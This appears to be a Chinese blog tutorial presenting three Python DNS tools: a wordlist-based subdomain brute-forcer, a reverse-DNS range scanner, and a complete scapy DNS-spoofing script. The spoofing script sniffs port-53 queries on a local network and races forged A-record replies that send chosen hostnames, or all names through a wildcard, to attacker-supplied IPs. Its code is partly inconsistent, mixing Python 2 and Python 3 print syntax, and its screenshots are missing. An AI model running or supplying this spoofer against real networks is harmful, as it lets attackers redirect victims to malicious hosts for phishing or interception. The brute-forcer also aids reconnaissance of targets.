
[Python] DNS-Related Python Program

2015-11-30 14:33 507 查看
1.DNS Dictionary Mapper

先建立一个文档,里面保存待测网站的子域名,程序会逐行取出,并且与域名做字符串拼接,随后调用socket.gethostbyname(),它的作用是接收一个域名,如果该域名真实存在就返回相应的IP地址。

源码如下:

import sys
import socket

# Two positional arguments are required: the wordlist and the target domain.
if len(sys.argv) < 3:
    print("%s: <dict_file> <domain>" % sys.argv[0])
    sys.exit(1)

def do_dns_lookup(name):
    """Resolve *name* with socket.gethostbyname() and print the outcome.

    Prints "<name>: <ipv4>" when the name resolves, or "<name>: <error>"
    when the resolver reports a socket.gaierror (the usual NXDOMAIN case).
    Any other exception propagates to the caller.
    """
    try:
        address = socket.gethostbyname(name)
    except socket.gaierror as err:
        outcome = str(err)
    else:
        outcome = address
    print(name + ": " + outcome)

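# Walk the wordlist once; each candidate label is prefixed to the target
# domain and looked up.  The file is closed by the `with` block even when a
# lookup raises (the original leaked the handle on any exception).
try:
    with open(sys.argv[1], "r") as fh:
        for word in fh:
            label = word.strip()
            if not label:
                # A blank line would otherwise query the bare ".<domain>".
                continue
            do_dns_lookup(label + "." + sys.argv[2])
except IOError:
    # Only I/O failures on the dictionary are reported here; the original
    # bare `except:` also swallowed KeyboardInterrupt and mislabelled any
    # unrelated error as a dictionary problem.
    print("Cannot read dictionary " + sys.argv[1])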
字典如下:



运行结果如下:



2.Reverse DNS Scanner

此程序的命令结构为python test.py <start_ip>-<stop_ip>

程序的关键就是调用socket.gethostbyaddr(),它会接受一个IP地址然后返回其对应的域名。但值得注意的是,不是所有的查询都会返回正确的结果。

源码:

import sys
import socket
from random import randint

# One positional argument is required: the "<start_ip>-<stop_ip>" range.
if len(sys.argv) < 2:
    print("%s: <start_ip>-<stop_ip>" % sys.argv[0])
    sys.exit(1)

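def get_ips(start_ip, stop_ip):
    """Return every dotted-quad IPv4 address from *start_ip* to *stop_ip*, inclusive.

    Both arguments are strings such as "10.0.0.1".  The result is a list of
    strings in ascending order; it is empty when *stop_ip* precedes
    *start_ip*.

    Raises ValueError for anything that is not four decimal octets in the
    range 0-255.  (The original hex-string trick silently produced garbage
    for octets above 255 or for addresses with fewer than four fields.)
    """

    def to_int(addr):
        # Pack the four octets big-endian into one integer.
        octets = addr.split('.')
        if len(octets) != 4:
            raise ValueError("not a dotted-quad IPv4 address: %r" % (addr,))
        value = 0
        for octet in octets:
            n = int(octet)
            if not 0 <= n <= 255:
                raise ValueError("octet out of range in %r: %s" % (addr, octet))
            value = (value << 8) | n
        return value

    def to_str(value):
        # Inverse of to_int: unpack the four big-endian octets.
        return "%d.%d.%d.%d" % (
            (value >> 24) & 255,
            (value >> 16) & 255,
            (value >> 8) & 255,
            value & 255,
        )

    first = to_int(start_ip)
    last = to_int(stop_ip)
    return [to_str(v) for v in range(first, last + 1)]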

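def dns_reverse_lookup(start_ip, stop_ip):
    """Reverse-resolve every address in [start_ip, stop_ip] in random order.

    For each address that has a PTR record, prints "<ip>: <hostname>".
    Addresses that fail to resolve (socket.herror / socket.error) are
    silently skipped, matching the original best-effort behaviour.

    The original drew a random index and `del`-eted it each iteration,
    which is O(n^2) over the range; shuffling once and iterating is O(n)
    and gives the same random visiting order.
    """
    from random import shuffle  # local import keeps the block self-contained

    ips = get_ips(start_ip, stop_ip)
    shuffle(ips)
    for lookup_ip in ips:
        try:
            hostname = socket.gethostbyaddr(lookup_ip)[0]
        except (socket.herror, socket.error):
            continue  # no PTR record / transient resolver failure
        print(lookup_ip + ": " + str(hostname))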

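# Expect exactly one "<start_ip>-<stop_ip>" argument.  The original unpacked
# split('-') directly and died with a bare ValueError on any other shape.
range_parts = sys.argv[1].split('-')
if len(range_parts) != 2:
    print("%s: <start_ip>-<stop_ip>" % sys.argv[0])
    sys.exit(1)
start_ip, stop_ip = range_parts
dns_reverse_lookup(start_ip, stop_ip)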
程序运行过程:



3.DNS-Spoofing

DNS欺骗的原理与ARP欺骗相似,攻击者将编造的IP作为某个DNS请求的响应包,并且希望自己的包比真正域名服务器的解答更早的到达。

具体地,程序用sniff()嗅探网络流量,得到目的端口或源端口为53的UDP包。

另外还需要一个host文件指明被攻击的网址以及对应的假IP。

源代码:

import sys
import getopt
import scapy.all as scapy

# Interface to sniff on and to send replies from; overridden by -i.
dev = "eth0"
# BPF filter handed to scapy.sniff(): UDP traffic to or from port 53 only.
# NOTE: this shadows the builtin filter(); the sniff() call at the bottom of
# the script references it by this name, so it is left unchanged here.
filter = "udp port 53"
# Path of the hosts file (-f); stays None until parsed from the command line.
# (Also shadows a Python 2 builtin name.)
file = None
# host-name -> IP address mapping filled by parse_host_file(); a '*' key is
# used by handle_packet() as a catch-all for names not listed explicitly.
dns_map = {}

def handle_packet(packet):
    """Answer a sniffed DNS query with a forged A record taken from dns_map.

    Invoked by scapy.sniff() for every packet that matches the "udp port 53"
    filter.  Only packets with qr == 0 and opcode == 0 (a standard query)
    are considered; the queried name is looked up in dns_map, falling back
    to the '*' entry, and when a mapping exists a reply carrying the query's
    own transaction id and question section is sent out on `dev`.

    Assumes every sniffed packet really carries IP, UDP and DNS layers:
    getlayer() returns None otherwise and the attribute accesses below would
    fail.

    Defender's note: the forged reply races the legitimate answer, so the
    client ends up seeing two responses for the same transaction id from the
    same apparent server address.  Conflicting answers for one id are an
    observable symptom on the wire, and a DNSSEC-validating resolver will
    reject the unsigned forgery for signed zones.
    """
    ip = packet.getlayer(scapy.IP)
    udp = packet.getlayer(scapy.UDP)
    dns = packet.getlayer(scapy.DNS)

    # standard (a record) dns query -- the test is on qr/opcode only; the
    # question's qtype is not inspected.
    if dns.qr == 0 and dns.opcode == 0:
        queried_host = dns.qd.qname[:-1]  # strip the trailing dot of the wire-format name
        resolved_ip = None

        # Exact host-name match first, then the '*' catch-all entry.
        if dns_map.get(queried_host):
            resolved_ip = dns_map.get(queried_host)
        elif dns_map.get('*'):
            resolved_ip = dns_map.get('*')

        if resolved_ip:
            # One A record with a 330 s TTL.  Addresses and UDP ports are
            # swapped relative to the query, and dns.id is copied so the
            # client matches the reply to its outstanding question.
            dns_answer = scapy.DNSRR(rrname=queried_host + ".", ttl=330, type="A", rclass="IN",rdata=resolved_ip)
            dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / scapy.UDP(sport=udp.dport,dport=udp.sport) / scapy.DNS(id=dns.id, qr=1, aa=0, rcode=0, qd=dns.qd, an=dns_answer)
            print "Send %s has %s to %s" % (queried_host,resolved_ip,ip.src)
            scapy.send(dns_reply, iface=dev)

def usage():
    """Print the command-line synopsis to stdout and exit with status 1."""
    synopsis = "%s -f <hosts-file> -i <dev>" % sys.argv[0]
    print(synopsis)
    sys.exit(1)

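def parse_host_file(file):
    """Load "<ip> <host>" lines from *file* into the module-level dns_map.

    Blank lines are skipped.  Every other line must contain exactly two
    whitespace-separated fields; a malformed line raises ValueError naming
    the file and line number (the original raised a bare unpacking error).
    The handle is closed on exit; the original left it open until garbage
    collection.

    The parameter name shadows the Python 2 builtin `file`; it is kept so
    the existing call site is unaffected.
    """
    with open(file) as fh:
        for lineno, line in enumerate(fh, 1):
            line = line.rstrip('\n')
            if not line:
                continue
            fields = line.split()
            if len(fields) != 2:
                raise ValueError(
                    "%s:%d: expected '<ip> <host>', got %r" % (file, lineno, line))
            ip, host = fields
            dns_map[host] = ip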

# Short options only: -f <hosts-file> and -i <dev>, both taking a value.
cmd_opts = "f:i:"
try:
    opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
    usage()  # prints the synopsis and exits with status 1

# Apply the parsed options.  The else-branch is not reachable for a result
# produced by getopt with the "f:i:" spec, but is kept as a defensive fallback.
for flag, value in opts:
    if flag == "-f":
        file = value
    elif flag == "-i":
        dev = value
    else:
        usage()

# A hosts file is mandatory; usage() exits, so the call below only runs
# when one was given.
if not file:
    usage()
parse_host_file(file)

# Capture loop: every packet matching `filter` on `dev` is passed to
# handle_packet(), which sends a forged answer for names present in dns_map.
# No count or timeout is given, so sniff() runs until interrupted.
print "Spoofing DNS requests on %s" % (dev)
scapy.sniff(iface=dev, filter=filter, prn=handle_packet)
host文件:



程序执行过程:



最终效果:


